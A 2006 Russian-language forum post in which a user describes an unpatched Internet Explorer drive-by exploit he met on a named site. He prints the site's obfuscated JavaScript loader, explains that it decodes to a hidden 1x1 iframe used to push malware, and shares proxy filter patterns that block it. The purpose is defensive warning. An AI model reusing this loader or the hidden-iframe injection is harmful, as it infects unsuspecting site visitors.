WRFan
Gold Member | Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Цитата:| Т.е. специально сделал скрипт, чтоб работал только в IE ? |
ну не только, чтобы позлить лисичников  мне и с технической точки зрения микрозофтские технологии больше нравятся, да и напрограмировался я в явскрипте уже достаточно с 97-ого года, надоело
напоролся кстати вчера на IE exploit. ну вы сейчас конечно смеяться будете. сначала я разгольствую о достоинствах ИЕ, а через 2 часа мой любимый браузер улетает в нирвану. этот эксплоит до сих пор не пофиксен микрозофтом, а ситуация страшная, я так немного проинформировался через гугал, огромное количество страниц инфицировано. я лично вот на этой странице напоролся: http://www.mircscripts.org/ (не открывайте через ИЕ!)
выудил код из сорс текста и написал простенькие прокс скрипты, чтобы он эти коды ломал или полностью вырезал. если хотите сами проинформироваться, просто скопируйте и задайте часть exploit кода в гугале.
НИ В КОЕМ СЛУЧАЕ НЕ ТЕСТИРУЙТЕ СЛЕДУЮЩИЙ КОД!!!
Код:
<script language="JavaScript">e = '0x00' + '31';str1 = "%8A%D2%D9%C4%AE%C3%C2%C9%DA%D5%8D%90%C4%D9%C3%D9%D0%D9%DA%D9%C2%C9%88%D6%D9%D2%D2%D5%DC%90%8C%8A%D9%D4%C0%D1%DD%D5%AE%C3%C0%D3%8D%90%D6%C2%C2%DE%88%9F%9F%DF%C5%C2%D3%DC%C2%9C%D3%DF%DD%9F%D2%C6%9F%90%AE%C7%D9%D2%C2%D6%8D%81%AE%D6%D5%D9%D7%D6%C2%8D%81%8C%8A%9F%D9%D4%C0%D1%DD%D5%8C%8A%9F%D2%D9%C4%8C";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>
|
расшифровка кода происходит с помощью замены document.write на слово alert. тогда код и не опасен больше
выглядит он примерно так:
Код:
<div style="visibility:hidden">
<iframe src="http://...../" width=1 height=1></iframe>
</div>
|
как видите, открывается внутренний фрейм и через него inject-ается любой файл, вирус, троян, что хотите. код всегда одинаковый, только адреса разные
для прокса я совсем простенькие скрипты написал:
Код:
[Patterns]
Name = "Viruses"
Active = TRUE
Limit = 256
Match = "tmp.charCodeAt\(0\)^e\)-127|"
"str1.slice\(i,i\+3\)"
|
и ещё я фильтрую все яваскрипты, содержащие часть кода, т.е. $NEST(<script,*tmp.charCodeAt\(0\)^e\)-127*,</script> |
Всего записей: 5275 | Зарегистр. 25-11-2002 | Отправлено: 17:17 12-11-2006 | Исправлено: WRFan, 17:19 12-11-2006 |
|
пытаюсь выделить достоинства ИЕ. хехехе 
